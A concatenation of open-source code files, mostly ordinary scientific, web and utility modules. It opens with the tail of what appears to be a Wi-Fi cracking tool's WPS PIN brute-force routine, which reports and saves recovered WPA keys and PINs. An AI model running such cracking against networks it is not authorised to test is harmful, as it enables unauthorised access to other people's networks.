break
stdout.flush()
# Clear out output file if bigger than 1mb
inf = open(temp + 'out.out', 'w')
inf.close()
# End of big "while not cracked" loop
if cracked:
if pin != '': print GR+'\n\n [+]'+G+' PIN found: %s' % (C+pin+W)
if key != '': print GR+' [+] %sWPA key found:%s %s' % (G, W, C+key+W)
WPA_FINDINGS.append(W+"found %s's WPA key: \"%s\", WPS PIN: %s" % (G+target.ssid+W, C+key+W, C+pin+W))
WPA_FINDINGS.append('')
save_cracked(target.bssid, target.ssid, "Key is '" + key + "' and PIN is '" + pin + "'", 'WPA')
except KeyboardInterrupt:
print R+'\n (^C)'+O+' WPS brute-force attack interrupted'+W
if attack_interrupted_prompt():
send_interrupt(proc)
print ''
exit_gracefully(0)
send_interrupt(proc)
return cracked
#c = CapFile('hs/KillfuckSoulshitter_C0-C1-C0-07-54-DC_2.cap', 'Killfuck Soulshitter', 'c0:c1:c0:07:54:dc')
#WPA_CRACKER = 'aircrack'
#cracked = wpa_crack(c)
#print cracked
#exit_gracefully(1)
if __name__ == '__main__':
try:
banner()
main()
except KeyboardInterrupt: print R+'\n (^C)'+O+' interrupted\n'+W
except EOFError: print R+'\n (^D)'+O+' interrupted\n'+W
exit_gracefully(0)
| gpl-2.0 |
mspark93/VTK | Filters/Core/Testing/Python/combStreamers2.py | 15 | 2257 | #!/usr/bin/env python
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# Create the RenderWindow, Renderer and both Actors
#
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# create pipeline
#
pl3d = vtk.vtkMultiBlockPLOT3DReader()
pl3d.SetXYZFileName("" + str(VTK_DATA_ROOT) + "/Data/combxyz.bin")
pl3d.SetQFileName("" + str(VTK_DATA_ROOT) + "/Data/combq.bin")
pl3d.SetScalarFunctionNumber(100)
pl3d.SetVectorFunctionNumber(202)
pl3d.Update()
output = pl3d.GetOutput().GetBlock(0)
ps = vtk.vtkPlaneSource()
ps.SetXResolution(4)
ps.SetYResolution(4)
ps.SetOrigin(2,-2,26)
ps.SetPoint1(2,2,26)
ps.SetPoint2(2,-2,32)
psMapper = vtk.vtkPolyDataMapper()
psMapper.SetInputConnection(ps.GetOutputPort())
psActor = vtk.vtkActor()
psActor.SetMapper(psMapper)
psActor.GetProperty().SetRepresentationToWireframe()
streamer = vtk.vtkDashedStreamLine()
streamer.SetInputData(output)
streamer.SetSourceData(ps.GetOutput())
streamer.SetMaximumPropagationTime(100)
streamer.SetIntegrationStepLength(.2)
streamer.SetStepLength(.001)
streamer.SetNumberOfThreads(1)
streamer.SetIntegrationDirectionToForward()
streamMapper = vtk.vtkPolyDataMapper()
streamMapper.SetInputConnection(streamer.GetOutputPort())
streamMapper.SetScalarRange(output.GetScalarRange())
streamline = vtk.vtkActor()
streamline.SetMapper(streamMapper)
outline = vtk.vtkStructuredGridOutlineFilter()
outline.SetInputData(output)
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
# Add the actors to the renderer, set the background and size
#
ren1.AddActor(psActor)
ren1.AddActor(outlineActor)
ren1.AddActor(streamline)
ren1.SetBackground(1,1,1)
renWin.SetSize(300,300)
ren1.SetBackground(0.1,0.2,0.4)
cam1 = ren1.GetActiveCamera()
cam1.SetClippingRange(3.95297,50)
cam1.SetFocalPoint(9.71821,0.458166,29.3999)
cam1.SetPosition(2.7439,-37.3196,38.7167)
cam1.SetViewUp(-0.16123,0.264271,0.950876)
# render the image
#
renWin.Render()
# prevent the tk window from showing up then start the event loop
# --- end of script --
| bsd-3-clause |
fhe-odoo/odoo | addons/mail/mail_vote.py | 439 | 1647 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2012-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
##############################################################################
from openerp.osv import fields, osv
class mail_vote(osv.Model):
''' Mail vote feature allow users to like and unlike messages attached
to a document. This allows for example to build a ranking-based
displaying of messages, for FAQ. '''
_name = 'mail.vote'
_description = 'Mail Vote'
_columns = {
'message_id': fields.many2one('mail.message', 'Message', select=1,
ondelete='cascade', required=True),
'user_id': fields.many2one('res.users', 'User', select=1,
ondelete='cascade', required=True),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
kalvdans/scipy | scipy/linalg/lapack.py | 12 | 8575 | """
Low-level LAPACK functions (:mod:`scipy.linalg.lapack`)
=======================================================
This module contains low-level functions from the LAPACK library.
The `*gegv` family of routines have been removed from LAPACK 3.6.0
and have been deprecated in SciPy 0.17.0. They will be removed in
a future release.
.. versionadded:: 0.12.0
.. warning::
These functions do little to no error checking.
It is possible to cause crashes by mis-using them,
so prefer using the higher-level routines in `scipy.linalg`.
Finding functions
-----------------
.. autosummary::
get_lapack_funcs
All functions
-------------
.. autosummary::
:toctree: generated/
sgbsv
dgbsv
cgbsv
zgbsv
sgbtrf
dgbtrf
cgbtrf
zgbtrf
sgbtrs
dgbtrs
cgbtrs
zgbtrs
sgebal
dgebal
cgebal
zgebal
sgees
dgees
cgees
zgees
sgeev
dgeev
cgeev
zgeev
sgeev_lwork
dgeev_lwork
cgeev_lwork
zgeev_lwork
sgegv
dgegv
cgegv
zgegv
sgehrd
dgehrd
cgehrd
zgehrd
sgehrd_lwork
dgehrd_lwork
cgehrd_lwork
zgehrd_lwork
sgelss
dgelss
cgelss
zgelss
sgelss_lwork
dgelss_lwork
cgelss_lwork
zgelss_lwork
sgelsd
dgelsd
cgelsd
zgelsd
sgelsd_lwork
dgelsd_lwork
cgelsd_lwork
zgelsd_lwork
sgelsy
dgelsy
cgelsy
zgelsy
sgelsy_lwork
dgelsy_lwork
cgelsy_lwork
zgelsy_lwork
sgeqp3
dgeqp3
cgeqp3
zgeqp3
sgeqrf
dgeqrf
cgeqrf
zgeqrf
sgerqf
dgerqf
cgerqf
zgerqf
sgesdd
dgesdd
cgesdd
zgesdd
sgesdd_lwork
dgesdd_lwork
cgesdd_lwork
zgesdd_lwork
sgesvd
dgesvd
cgesvd
zgesvd
sgesvd_lwork
dgesvd_lwork
cgesvd_lwork
zgesvd_lwork
sgesv
dgesv
cgesv
zgesv
sgesvx
dgesvx
cgesvx
zgesvx
sgecon
dgecon
cgecon
zgecon
ssysv
dsysv
csysv
zsysv
ssysv_lwork
dsysv_lwork
csysv_lwork
zsysv_lwork
ssysvx
dsysvx
csysvx
zsysvx
ssysvx_lwork
dsysvx_lwork
csysvx_lwork
zsysvx_lwork
chesv
zhesv
chesv_lwork
zhesv_lwork
chesvx
zhesvx
chesvx_lwork
zhesvx_lwork
sgetrf
dgetrf
cgetrf
zgetrf
sgetri
dgetri
cgetri
zgetri
sgetri_lwork
dgetri_lwork
cgetri_lwork
zgetri_lwork
sgetrs
dgetrs
cgetrs
zgetrs
sgges
dgges
cgges
zgges
sggev
dggev
cggev
zggev
chbevd
zhbevd
chbevx
zhbevx
cheev
zheev
cheevd
zheevd
cheevr
zheevr
chegv
zhegv
chegvd
zhegvd
chegvx
zhegvx
slarf
dlarf
clarf
zlarf
slarfg
dlarfg
clarfg
zlarfg
slartg
dlartg
clartg
zlartg
slasd4
dlasd4
slaswp
dlaswp
claswp
zlaswp
slauum
dlauum
clauum
zlauum
spbsv
dpbsv
cpbsv
zpbsv
spbtrf
dpbtrf
cpbtrf
zpbtrf
spbtrs
dpbtrs
cpbtrs
zpbtrs
sposv
dposv
cposv
zposv
sposvx
dposvx
cposvx
zposvx
spocon
dpocon
cpocon
zpocon
spotrf
dpotrf
cpotrf
zpotrf
spotri
dpotri
cpotri
zpotri
spotrs
dpotrs
cpotrs
zpotrs
crot
zrot
strsyl
dtrsyl
ctrsyl
ztrsyl
strtri
dtrtri
ctrtri
ztrtri
strtrs
dtrtrs
ctrtrs
ztrtrs
cunghr
zunghr
cungqr
zungqr
cungrq
zungrq
cunmqr
zunmqr
sgtsv
dgtsv
cgtsv
zgtsv
sptsv
dptsv
cptsv
zptsv
slamch
dlamch
sorghr
dorghr
sorgqr
dorgqr
sorgrq
dorgrq
sormqr
dormqr
ssbev
dsbev
ssbevd
dsbevd
ssbevx
dsbevx
ssyev
dsyev
ssyevd
dsyevd
ssyevr
dsyevr
ssygv
dsygv
ssygvd
dsygvd
ssygvx
dsygvx
slange
dlange
clange
zlange
ilaver
"""
#
# Author: Pearu Peterson, March 2002
#
from __future__ import division, print_function, absolute_import
__all__ = ['get_lapack_funcs']
import numpy as _np
from .blas import _get_funcs
# Backward compatibility:
from .blas import find_best_blas_type as find_best_lapack_type
from scipy.linalg import _flapack
try:
from scipy.linalg import _clapack
except ImportError:
_clapack = None
# Backward compatibility
from scipy._lib._util import DeprecatedImport as _DeprecatedImport
clapack = _DeprecatedImport("scipy.linalg.blas.clapack", "scipy.linalg.lapack")
flapack = _DeprecatedImport("scipy.linalg.blas.flapack", "scipy.linalg.lapack")
# Expose all functions (only flapack --- clapack is an implementation detail)
empty_module = None
from scipy.linalg._flapack import *
del empty_module
_dep_message = """The `*gegv` family of routines has been deprecated in
LAPACK 3.6.0 in favor of the `*ggev` family of routines.
The corresponding wrappers will be removed from SciPy in
a future release."""
cgegv = _np.deprecate(cgegv, old_name='cgegv', message=_dep_message)
dgegv = _np.deprecate(dgegv, old_name='dgegv', message=_dep_message)
sgegv = _np.deprecate(sgegv, old_name='sgegv', message=_dep_message)
zgegv = _np.deprecate(zgegv, old_name='zgegv', message=_dep_message)
# Modyfy _flapack in this scope so the deprecation warnings apply to
# functions returned by get_lapack_funcs.
_flapack.cgegv = cgegv
_flapack.dgegv = dgegv
_flapack.sgegv = sgegv
_flapack.zgegv = zgegv
# some convenience alias for complex functions
_lapack_alias = {
'corghr': 'cunghr', 'zorghr': 'zunghr',
'corghr_lwork': 'cunghr_lwork', 'zorghr_lwork': 'zunghr_lwork',
'corgqr': 'cungqr', 'zorgqr': 'zungqr',
'cormqr': 'cunmqr', 'zormqr': 'zunmqr',
'corgrq': 'cungrq', 'zorgrq': 'zungrq',
}
def get_lapack_funcs(names, arrays=(), dtype=None):
"""Return available LAPACK function objects from names.
Arrays are used to determine the optimal prefix of LAPACK routines.
Parameters
----------
names : str or sequence of str
Name(s) of LAPACK functions without type prefix.
arrays : sequence of ndarrays, optional
Arrays can be given to determine optimal prefix of LAPACK
routines. If not given, double-precision routines will be
used, otherwise the most generic type in arrays will be used.
dtype : str or dtype, optional
Data-type specifier. Not used if `arrays` is non-empty.
Returns
-------
funcs : list
List containing the found function(s).
Notes
-----
This routine automatically chooses between Fortran/C
interfaces. Fortran code is used whenever possible for arrays with
column major order. In all other cases, C code is preferred.
In LAPACK, the naming convention is that all functions start with a
type prefix, which depends on the type of the principal
matrix. These can be one of {'s', 'd', 'c', 'z'} for the numpy
types {float32, float64, complex64, complex128} respectevely, and
are stored in attribute `typecode` of the returned functions.
"""
return _get_funcs(names, arrays, dtype,
"LAPACK", _flapack, _clapack,
"flapack", "clapack", _lapack_alias)
def _compute_lwork(routine, *args, **kwargs):
"""
Round floating-point lwork returned by lapack to integer.
Several LAPACK routines compute optimal values for LWORK, which
they return in a floating-point variable. However, for large
values of LWORK, single-precision floating point is not sufficient
to hold the exact value --- some LAPACK versions (<= 3.5.0 at
least) truncate the returned integer to single precision and in
some cases this can be smaller than the required value.
"""
wi = routine(*args, **kwargs)
if len(wi) < 2:
raise ValueError('')
info = wi[-1]
if info != 0:
raise ValueError("Internal work array size computation failed: "
"%d" % (info,))
lwork = [w.real for w in wi[:-1]]
dtype = getattr(routine, 'dtype', None)
if dtype == _np.float32 or dtype == _np.complex64:
# Single-precision routine -- take next fp value to work
# around possible truncation in LAPACK code
lwork = _np.nextafter(lwork, _np.inf, dtype=_np.float32)
lwork = _np.array(lwork, _np.int64)
if _np.any(_np.logical_or(lwork < 0, lwork > _np.iinfo(_np.int32).max)):
raise ValueError("Too large work array required -- computation cannot "
"be performed with standard 32-bit LAPACK.")
lwork = lwork.astype(_np.int32)
if lwork.size == 1:
return lwork[0]
return lwork
| bsd-3-clause |
paninetworks/neutron | neutron/tests/tempest/services/identity/v3/json/endpoints_client.py | 23 | 3361 | # Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
from neutron.tests.tempest.common import service_client
class EndPointClientJSON(service_client.ServiceClient):
api_version = "v3"
def list_endpoints(self):
"""GET endpoints."""
resp, body = self.get('endpoints')
self.expected_success(200, resp.status)
body = json.loads(body)
return service_client.ResponseBodyList(resp, body['endpoints'])
def create_endpoint(self, service_id, interface, url, **kwargs):
"""Create endpoint.
Normally this function wouldn't allow setting values that are not
allowed for 'enabled'. Use `force_enabled` to set a non-boolean.
"""
region = kwargs.get('region', None)
if 'force_enabled' in kwargs:
enabled = kwargs.get('force_enabled', None)
else:
enabled = kwargs.get('enabled', None)
post_body = {
'service_id': service_id,
'interface': interface,
'url': url,
'region': region,
'enabled': enabled
}
post_body = json.dumps({'endpoint': post_body})
resp, body = self.post('endpoints', post_body)
self.expected_success(201, resp.status)
body = json.loads(body)
return service_client.ResponseBody(resp, body['endpoint'])
def update_endpoint(self, endpoint_id, service_id=None, interface=None,
url=None, region=None, enabled=None, **kwargs):
"""Updates an endpoint with given parameters.
Normally this function wouldn't allow setting values that are not
allowed for 'enabled'. Use `force_enabled` to set a non-boolean.
"""
post_body = {}
if service_id is not None:
post_body['service_id'] = service_id
if interface is not None:
post_body['interface'] = interface
if url is not None:
post_body['url'] = url
if region is not None:
post_body['region'] = region
if 'force_enabled' in kwargs:
post_body['enabled'] = kwargs['force_enabled']
elif enabled is not None:
post_body['enabled'] = enabled
post_body = json.dumps({'endpoint': post_body})
resp, body = self.patch('endpoints/%s' % endpoint_id, post_body)
self.expected_success(200, resp.status)
body = json.loads(body)
return service_client.ResponseBody(resp, body['endpoint'])
def delete_endpoint(self, endpoint_id):
"""Delete endpoint."""
resp_header, resp_body = self.delete('endpoints/%s' % endpoint_id)
self.expected_success(204, resp_header.status)
return service_client.ResponseBody(resp_header, resp_body)
| apache-2.0 |
kawamon/hue | desktop/core/ext-py/celery-4.2.1/celery/events/snapshot.py | 3 | 3401 | # -*- coding: utf-8 -*-
"""Periodically store events in a database.
Consuming the events as a stream isn't always suitable
so this module implements a system to take snapshots of the
state of a cluster at regular intervals. There's a full
implementation of this writing the snapshots to a database
in :mod:`djcelery.snapshots` in the `django-celery` distribution.
"""
from __future__ import absolute_import, print_function, unicode_literals
from kombu.utils.limits import TokenBucket
from celery import platforms
from celery.app import app_or_default
from celery.utils.dispatch import Signal
from celery.utils.imports import instantiate
from celery.utils.log import get_logger
from celery.utils.time import rate
from celery.utils.timer2 import Timer
__all__ = ('Polaroid', 'evcam')
logger = get_logger('celery.evcam')
class Polaroid(object):
"""Record event snapshots."""
timer = None
shutter_signal = Signal(name='shutter_signal', providing_args={'state'})
cleanup_signal = Signal(name='cleanup_signal')
clear_after = False
_tref = None
_ctref = None
def __init__(self, state, freq=1.0, maxrate=None,
cleanup_freq=3600.0, timer=None, app=None):
self.app = app_or_default(app)
self.state = state
self.freq = freq
self.cleanup_freq = cleanup_freq
self.timer = timer or self.timer or Timer()
self.logger = logger
self.maxrate = maxrate and TokenBucket(rate(maxrate))
def install(self):
self._tref = self.timer.call_repeatedly(self.freq, self.capture)
self._ctref = self.timer.call_repeatedly(
self.cleanup_freq, self.cleanup,
)
def on_shutter(self, state):
pass
def on_cleanup(self):
pass
def cleanup(self):
logger.debug('Cleanup: Running...')
self.cleanup_signal.send(sender=self.state)
self.on_cleanup()
def shutter(self):
if self.maxrate is None or self.maxrate.can_consume():
logger.debug('Shutter: %s', self.state)
self.shutter_signal.send(sender=self.state)
self.on_shutter(self.state)
def capture(self):
self.state.freeze_while(self.shutter, clear_after=self.clear_after)
def cancel(self):
if self._tref:
self._tref() # flush all received events.
self._tref.cancel()
if self._ctref:
self._ctref.cancel()
def __enter__(self):
self.install()
return self
def __exit__(self, *exc_info):
self.cancel()
def evcam(camera, freq=1.0, maxrate=None, loglevel=0,
logfile=None, pidfile=None, timer=None, app=None):
"""Start snapshot recorder."""
app = app_or_default(app)
if pidfile:
platforms.create_pidlock(pidfile)
app.log.setup_logging_subsystem(loglevel, logfile)
print('-> evcam: Taking snapshots with {0} (every {1} secs.)'.format(
camera, freq))
state = app.events.State()
cam = instantiate(camera, state, app=app, freq=freq,
maxrate=maxrate, timer=timer)
cam.install()
conn = app.connection_for_read()
recv = app.events.Receiver(conn, handlers={'*': state.event})
try:
try:
recv.capture(limit=None)
except KeyboardInterrupt:
raise SystemExit
finally:
cam.cancel()
conn.close()
| apache-2.0 |
titom1986/CouchPotatoServer | couchpotato/core/media/movie/providers/trailer/youtube_dl/extractor/veoh.py | 13 | 4826 | from __future__ import unicode_literals
import re
import json
from .common import InfoExtractor
from ..utils import (
compat_urllib_request,
int_or_none,
ExtractorError,
)
class VeohIE(InfoExtractor):
_VALID_URL = r'http://(?:www\.)?veoh\.com/(?:watch|iphone/#_Watch)/(?P<id>(?:v|yapi-)[\da-zA-Z]+)'
_TESTS = [
{
'url': 'http://www.veoh.com/watch/v56314296nk7Zdmz3',
'md5': '620e68e6a3cff80086df3348426c9ca3',
'info_dict': {
'id': '56314296',
'ext': 'mp4',
'title': 'Straight Backs Are Stronger',
'uploader': 'LUMOback',
'description': 'At LUMOback, we believe straight backs are stronger. The LUMOback Posture & Movement Sensor: It gently vibrates when you slouch, inspiring improved posture and mobility. Use the app to track your data and improve your posture over time. ',
},
},
{
'url': 'http://www.veoh.com/watch/v27701988pbTc4wzN?h1=Chile+workers+cover+up+to+avoid+skin+damage',
'md5': '4a6ff84b87d536a6a71e6aa6c0ad07fa',
'info_dict': {
'id': '27701988',
'ext': 'mp4',
'title': 'Chile workers cover up to avoid skin damage',
'description': 'md5:2bd151625a60a32822873efc246ba20d',
'uploader': 'afp-news',
'duration': 123,
},
},
{
'url': 'http://www.veoh.com/watch/v69525809F6Nc4frX',
'md5': '4fde7b9e33577bab2f2f8f260e30e979',
'note': 'Embedded ooyala video',
'info_dict': {
'id': '69525809',
'ext': 'mp4',
'title': 'Doctors Alter Plan For Preteen\'s Weight Loss Surgery',
'description': 'md5:f5a11c51f8fb51d2315bca0937526891',
'uploader': 'newsy-videos',
},
'skip': 'This video has been deleted.',
},
]
def _extract_formats(self, source):
formats = []
link = source.get('aowPermalink')
if link:
formats.append({
'url': link,
'ext': 'mp4',
'format_id': 'aow',
})
link = source.get('fullPreviewHashLowPath')
if link:
formats.append({
'url': link,
'format_id': 'low',
})
link = source.get('fullPreviewHashHighPath')
if link:
formats.append({
'url': link,
'format_id': 'high',
})
return formats
def _extract_video(self, source):
return {
'id': source.get('videoId'),
'title': source.get('title'),
'description': source.get('description'),
'thumbnail': source.get('highResImage') or source.get('medResImage'),
'uploader': source.get('username'),
'duration': int_or_none(source.get('length')),
'view_count': int_or_none(source.get('views')),
'age_limit': 18 if source.get('isMature') == 'true' or source.get('isSexy') == 'true' else 0,
'formats': self._extract_formats(source),
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
if video_id.startswith('v'):
rsp = self._download_xml(
r'http://www.veoh.com/api/findByPermalink?permalink=%s' % video_id, video_id, 'Downloading video XML')
stat = rsp.get('stat')
if stat == 'ok':
return self._extract_video(rsp.find('./videoList/video'))
elif stat == 'fail':
raise ExtractorError(
'%s said: %s' % (self.IE_NAME, rsp.find('./errorList/error').get('errorMessage')), expected=True)
webpage = self._download_webpage(url, video_id)
age_limit = 0
if 'class="adultwarning-container"' in webpage:
self.report_age_confirmation()
age_limit = 18
request = compat_urllib_request.Request(url)
request.add_header('Cookie', 'confirmedAdult=true')
webpage = self._download_webpage(request, video_id)
m_youtube = re.search(r'http://www\.youtube\.com/v/(.*?)(\&|"|\?)', webpage)
if m_youtube is not None:
youtube_id = m_youtube.group(1)
self.to_screen('%s: detected Youtube video.' % video_id)
return self.url_result(youtube_id, 'Youtube')
info = json.loads(
self._search_regex(r'videoDetailsJSON = \'({.*?})\';', webpage, 'info').replace('\\\'', '\''))
video = self._extract_video(info)
video['age_limit'] = age_limit
return video
| gpl-3.0 |
yurri92/MPLS-inventory-management | MPLSinventory/tools.py | 1 | 14446 | from __future__ import print_function
import os
import json
import csv
import re
from copy import copy
from tqdm import tqdm
COMPILED_REGEXES = {}
def search(regex, thing):
""" Regex search anything.
Determine what class the thing is and convert that to a string or list of strings
returns the results for the first occurance in the list of strings
the result are the subgroups for the regex match
- if the regex has a single capture group a single item is returned
- if the regex has multiple capture groups, a tuple is returned with all subgroups
"""
result = ()
if isinstance(thing, list):
for item in thing:
result = search(regex, item)
if result:
if isinstance(result, tuple):
if any(result): # reduce(lambda x, y: bool(x) or bool(y), result): # test if tuple has results
break
else: # if result is not a tuple
break
if isinstance(thing, str): # or isinstance(thing, unicode):
if regex not in COMPILED_REGEXES.keys():
COMPILED_REGEXES[regex] = re.compile(regex)
compiled_regex = COMPILED_REGEXES[regex]
n = compiled_regex.groups # number of capture groups requested
result = tuple(n * ['']) # create tuple of empty strings
match = compiled_regex.search(thing)
# match = re.search(compiled_regex, thing)
if match:
result = match.groups('')
if len(result) == 1:
result = result[0]
return result
def search_all(regex, thing):
""" Regex search all lines in anything.
determines what class the thing is and converts that to a list of things
each item or line in the list is searched using the regex and search(regex, thing)
if the item has a match, the results are added to a list
"""
result = []
if isinstance(thing, str):
thing = thing.splitlines()
if isinstance(thing, list):
for item in thing:
r = search(regex, item)
if isinstance(r, str):
if r:
result += [r]
if isinstance(r, tuple):
if any(r): # reduce(lambda x, y: bool(x) or bool(y), r): # test if tuple has results
result += [r]
return result
def list_files(regex, path):
return search_all(regex, os.listdir(path))
def read_files_to_objects(path, result_type, regex=r'(.+)', id='', verbose=False):
result = {}
file_names = list_files(regex, path)
# if verbose:
# file_names = tqdm(file_names)
total = len(file_names)
for i, file_name in enumerate(file_names, 1):
if verbose:
# pass
print("opening : {}/{} {}/{}...".format(i, total, path, file_name), end="")
value = result_type.load(file_name, path=path)
if value:
key = getattr(value, id, file_name)
result[key] = value
# del value.config
if verbose:
# pass
print("parsed config for :{}".format(key))
else:
if verbose:
# pass
print("skipping")
return result
def assign_attr_if_better(attribute_name, obj1, obj2):
"""assign an attribute if from obj1 to obj2 if the attr has a value
on obj1, and still has no valueon obj2"""
attribute_obj1 = getattr(obj1, attribute_name, None)
attribute_obj2 = getattr(obj2, attribute_name, None)
if attribute_obj1 and not attribute_obj2:
setattr(obj2, attribute_name, attribute_obj1)
def getattr_recursive(obj, name):
"""Gets attributes from objects recursively.
'name' can contain multiple attributes
'todo': lists and dicts
"""
# split the name into a queue of keywords
name_queue = []
while name:
if name[0] == '.':
name = name[1:]
attribute, remainder = search(r'^([\w_]+)(.*)', name) # normal attribute name
if attribute:
name = remainder
name_queue.append(attribute)
key, remainder = search(r'^\[[\'\"](.+?)[\'\"]\](.*)', name) # dictionary key
if key:
name = remainder
name_queue.append(key)
index, remainder = search(r'^\[(\d+)\](.*)', name) # list index
if index:
name = remainder
name_queue.append(int(index))
# retrieve the keywords from the object.
result = obj
while name_queue and result:
if isinstance(result, list):
index = name_queue.pop(0)
if index < len(result):
result = result[index]
else:
result = ''
elif isinstance(result, dict):
key = name_queue.pop(0)
if key in result.keys():
result = result[key]
else:
result = ''
else:
attribute = name_queue.pop(0)
result = getattr(result, attribute, '')
return result
def create_dict_from_objects(objects, attributes=[]):
"""to improve, convert ip objects to str (if type is ip then str(obj))"""
result = {}
for key, my_obj in objects.items():
if not attributes:
result[key] = my_obj.json()
else:
r = {}
for attribute in attributes:
item = getattr_recursive(my_obj, attribute)
if attribute.endswith('ip') and item:
item = str(item)
if attribute == 'hsrp' and item:
item = str(item)
r[attribute] = item
result[key] = r
return result
def save_dict_as_json(dict, filename):
with open(filename, 'w') as fp:
json.dump(dict, fp, indent=4)
def save_dict_as_csv(jdict, filename, attributes=None, sort_by=None, group_by=None):
keylist = list(jdict.keys())
if attributes is None:
attributes = list(jdict[keylist[0]].keys())
if sort_by:
emptys = [key for key in keylist if not jdict[key][sort_by]]
keylist = [key for key in keylist if jdict[key][sort_by]]
keylist = sorted(keylist, key=lambda i: jdict[i][sort_by])
keylist.extend(emptys)
if group_by:
keylist2 = copy(keylist)
keylist = []
while keylist2:
key = keylist2.pop(0)
keylist.append(key)
if jdict[key][group_by]:
group_id = jdict[key][group_by]
group = []
for key in keylist2:
if jdict[key][group_by] == group_id:
group.append(key)
keylist.extend(group)
for key in group:
keylist2.remove(key)
with open(filename, 'w') as fp:
f = csv.writer(fp)
f.writerow(attributes)
for key in keylist:
item = jdict[key]
row = []
for attribute in attributes:
value = ''
if attribute in item.keys():
value = item[attribute]
# if isinstance(value, list):
# value = '; '.join(value) # TODO doesnt work if value is a list of lists or tuples
row.append(value)
if "lan_ips" in item.keys():
row.extend(item["lan_ips"])
f.writerow(row)
def create_empty_template(json_object):
if isinstance(json_object, dict):
r = {}
for key, value in json_object.items():
r[key] = create_empty_template(value)
return r
if isinstance(json_object, list):
r = []
for value in json_object:
i = create_empty_template(value)
if i:
r.append(i)
return r
if isinstance(json_object, str): # or isinstance(json_object, unicode):
return ''
if isinstance(json_object, int) or isinstance(json_object, float):
return 0
def copy_json_object(json_object1, json_object2, attributes=None, key_prepend=''):
"""copy attributes from json_object2 to json_object1
- prepend the keys with key_prepend
"""
if attributes is None:
attributes = json_object2.keys()
for attribute in attributes:
key1 = key_prepend + attribute
if key1 in json_object1.keys():
if json_object1[key1] and not json_object2[attribute]:
continue
json_object1[key1] = json_object2[attribute]
def combine(dict1, dict2, match_function, key_prepend='', verbose=False):
"""combine the json_objects in dict1 with dict2
- match_function(json_object, dict2) will return the best matching json_object from dict2
- dict1 will contain all the combined jsons
- the keys of the copied items will be prepended with the key_prepend
- ?? mismatching items will be stored in dict1['mismatch']
- todo: add not used items from dict2
"""
# empty_json_object2 = create_empty_template(dict2[dict2.keys()[0]])
empty_json_object2 = create_empty_template(dict2[list(dict2.keys())[0]])
if verbose:
keylist = tqdm(dict1.keys())
else:
keylist = dict1.keys()
for key1 in keylist:
json_object1 = dict1[key1]
json_object2 = match_function(json_object1, dict2)
if not json_object2:
json_object2 = empty_json_object2
copy_json_object(json_object1, json_object2, key_prepend=key_prepend)
def combine2(dict1, dict2, match_function, key_prepend=''):
"""combine the json_objects in dict1 with dict2 and create a new dict
- match_function(json_object, dict2) will return the best matching json_object from dict2
- dict1 will contain all the combined jsons
- the keys of the copied items will be prepended with the key_prepend
- ?? mismatching items will be stored in dict1['mismatch']
- todo: add not used items from dict2
"""
keys2 = list(dict2.keys())
# empty_json_object1 = create_empty_template(dict1.values()[0])
# empty_json_object2 = create_empty_template(dict2.values()[0])
empty_json_object2 = create_empty_template(dict2[list(dict2.keys())[0]])
empty_json_object1 = create_empty_template(dict1[list(dict1.keys())[0]])
for key1, json_object1 in dict1.items():
json_object2 = empty_json_object2
key2 = match_function(json_object1, dict2)
if key2:
json_object2 = dict2[key2]
if key2 in keys2:
keys2.remove(key2)
copy_json_object(json_object1, json_object2, key_prepend=key_prepend)
for i, key2 in enumerate(keys2):
json_object1 = copy(empty_json_object1)
json_object2 = dict2[key2]
copy_json_object(json_object1, json_object2, key_prepend=key_prepend)
dict1['mismatch'+str(i)] = json_object1
def combine3(dict1, dict2, score_function, key_prepend='', add_unused=True, verbose=False, unknown='unknown'):
"""combine best match from dict2 to dict1 based on a score.
For each item in dict1 the best possible candidate from dict2 is combined.
- Calculates for each combination of items in dict1 and dict2 the score
- For each item from dict1 all the possible candidates are selected from dict2
based on max(score).
- For each candidate from dict2 the max(score) to all items in dict1 is calculated.
If these max(score)'s are identical there is a fit.
If not, the canidate in dict2 has a better fit to another dict1 item.
"""
empty_json_object1 = create_empty_template(dict1[list(dict1.keys())[0]])
empty_json_object2 = create_empty_template(dict2[list(dict2.keys())[0]])
# empty_json_object1 = create_empty_template(dict1.values()[0])
# empty_json_object2 = create_empty_template(dict2.values()[0])
keys1 = list(dict1.keys())
keys2 = list(dict2.keys())
used_keys2 = []
scores_matrix = []
candidates = {}
if verbose:
keylist = tqdm(keys1)
else:
keylist = keys1
for k1 in keylist:
# create matrix row
row = []
for k2 in keys2:
score = score_function(dict1[k1], dict2[k2])
row.append(score)
scores_matrix.append(row)
# find max scoring elements from dict2 as candidates for dict1[k1]
candidates[k1] = []
max_score = max(row)
# find k2's for that score
if max_score > 0:
for i, (k2, score) in enumerate(zip(keys2, row)):
if score == max_score:
candidates[k1].append((i, k2, score))
for k1 in keys1:
json_object1 = dict1[k1]
json_object2 = empty_json_object2
for i, k2, score in candidates[k1]:
keys2_column = column(scores_matrix, i)
max_score = max(keys2_column)
